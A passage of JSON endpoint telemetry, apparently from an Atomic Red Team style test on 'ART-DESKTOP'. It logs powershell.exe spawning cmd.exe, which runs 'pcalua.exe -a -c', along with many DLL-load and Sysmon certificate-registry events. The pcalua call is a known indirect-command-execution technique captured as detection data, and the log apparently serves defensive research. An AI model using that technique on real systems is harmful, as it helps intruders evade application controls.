-c\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7004, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573973190000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973070000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573973230000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "event_type": "registry", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883573973230000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "command_line": "pcalua.exe -a -c", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2036, - "ppid": 7004, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "create", - "timestamp": 131883573973300000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}", - "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pcalua.exe", - "image_path": "C:\\Windows\\System32\\pcalua.exe", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973390000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973540000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973700016, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573973860000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 